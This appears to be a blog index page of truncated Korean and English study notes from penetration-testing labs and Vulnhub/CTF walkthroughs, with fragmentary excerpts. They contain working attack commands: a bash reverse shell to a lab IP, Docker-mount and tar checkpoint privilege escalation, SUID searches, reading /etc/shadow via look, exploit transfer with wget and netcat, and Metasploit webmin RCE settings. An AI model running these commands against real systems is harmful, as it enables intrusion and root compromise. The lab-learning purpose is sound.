MIN

CSRF (Cross-Site Request Forgery) : 크로스 사이트 요청 위조공격 목표: 사용자의 권한을 훔치지 않고, 그 권한으로 액션을 실행하는 것.핵심: 웹 브라우저는 사용자가 로그인해둔 사이트(은행, 쇼핑몰 등)에 요청을 보낼 때, 인증 정보(쿠키)를 묻지도 따지지도 않고 자동으로 함께 보낸다.공격: 공격자는 이 자동 전송되는 쿠키를 이용해, 피해자가 무심코 열어본 다른 웹페이지에 위장된 요청을 숨겨 놓는다.내가 은행 앱에 로그인(쿠키 저장) 해 놓은 상태에서, 해커가 보낸 수상한 문자(악성 웹페이지)를 실수로 누르면, 내 은행 계좌로부터 해커에게 이체되는 요청이 나도 모르게 은행 서버로 보내지는 것과 같다. PoC (Proof of Concept) 의 역할PoC는 위 공격이 실제로 가..

docker privileges escalation 검색 (GTFOBins 홈페이지 참조) # 도커 컨테이너를 이용해 사용자 컴퓨터의 전체 파일 시스템을 임시로 마운트하고 셸 환경을 실행docker run -v /:/mnt --rm -it alpine chroot /mnt sh 호스트 시스템의 전체 파일 시스템을 마운트한 alpine 컨테이너를 실행하고, 컨테이너 내부에서 chroot 명령어로 호스트의 루트로 환경을 바꾼 후, 셸(sh)을 실행한다. 이를 통해 컨테이너 안에서 호스트 시스템에 대한 관리 작업을 수행할 수 있게 된다.

# 루트 디렉터리부터 시작하여 소유자가 root이고 SUID 권한이 설정된 일반 파일을 모두 찾기find / -user root -perm /4000 -file f

Fuzzing : 파라미터 네임 무작위 대입 공격 다음 명령어를 사용하여 리버스 쉘을 생성 (Kali에서는 7777번 포트 리스닝)bash -c 'bash -i >& /dev/tcp/192.168.16.57/7777 0>&1' 하지만 이 코드 그대로 URL에 대입하면 접속되지않아서 URL로 인코딩하여 대입하기로 함 curl -si -u '' sftp://192.168.5.119/test -k 이 명령어는 SFTP 서버의 인증 과정 취약점을 이용해 PHP 코드를 업로드하는 시도입니다.curl -si: curl은 URL을 통해 데이터를 전송하는 도구입니다. -s는 진행 표시줄 등을 숨겨 조용히 실행하도록 하고, -i는 HTTP 응답 헤더를 포함하여 보여줍니다.-u '': -u는 사용자 ..

There is a need to transfer this exploit so, launch the Python server with the following command:python -m SimpleHTTPServer 80Let’s start the Netcat listener on new port 8888.nc -lvp 8888Now, download the created exploit using “wget” in the tmp foldercd /tmpwget http://192.168.1.3/poc.pyOnce it is downloaded, now run the exploit with the following command:python3 poc.pyCapture the root flagWe re..

fcrackzip은 ZIP 파일의 비밀번호를 해독하는 도구로써,무차별 대입 공격(Brute-force attack) 이나,사전 공격(Dictionary attack)방식을 사용해서 비밀번호를 찾아낸다. 파이썬의 pty 모듈을 이용해 /bin/bash라는 새로운 터미널 세션을 생성→ 불안정한 셸 세션 위에서 완전한 기능을 갖춘 /bin/bash 셸을 다시 생성하여, 더 안정적이고 사용하기 편리한 터미널 환경 구축 look:이 명령어는 특정 단어를 사전 파일(words)에서 찾아주는 리눅스 유틸리티로써, 특정 조건과 옵션을 결합하면 이 명령어가 파일의 내용을 읽는 데 악용될 수 있다. look 명령어와 함께 LFILE=/etc/shadow를 사용하는 것은 look ..

myadmin#p4szw0r4d compress 파일 이용echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > shell.shecho "" > "--checkpoint-action=exec=sh shell.sh"echo "" > --checkpoint=1ls -alh./compresscd /tmp./bash -p https://www.infosecarticles.com/keyring-vulnhub-walkthrough/

웹 쉘 말고 다른 방법으로 root 권한 획득하기 : MSF6 Console로 접속하기 msf6 > use exploitt/linux/http/webmin_packageup_rce msf6 exploit > show optionsmsf6 exploit > set rhosts 192.168.16.52msf6 exploit > set lhost 192.168.16.103 (kali ip)msf6 exploit > set username adminmsf6 exploit > set password tokiohotelmsf6 exploit > set ssl truemsf6 exploit > show optionsmsf6 exploit > run 다음 과정을 거치면 root 권한 획득 가능

여기서, 스테가노그래피란? 스테가노그래피는 '비밀 통신' 기술의 한 종류로, 메시지나 파일을 다른 파일(예: 사진, 오디오, 동영상) 안에 숨겨서, 겉으로 보기에는 아무런 이상이 없는 것처럼 보이게 하는 기술입니다.암호화(Cryptography)와는 어떻게 달라?암호화: 메시지를 알아볼 수 없는 형태로 '변형' 합니다.예: "안녕" -> "x7d#kL2"메시지 자체가 숨겨지지는 않기 때문에, 누군가 암호화된 메시지를 발견하면 "이건 비밀 메시지구나"라고 알아차릴 수 있습니다.스테가노그래피: 메시지 자체를 '숨깁니다'.예: "안녕"이라는 글자를 평범한 고양이 사진 안에 숨깁니다.겉으로 보면 그냥 고양이 사진일 뿐이라서, 누군가 이 파일을 보더라도 그 안에 비밀 메시지가 있다는 사실조차 알지 못합니다.어떻게..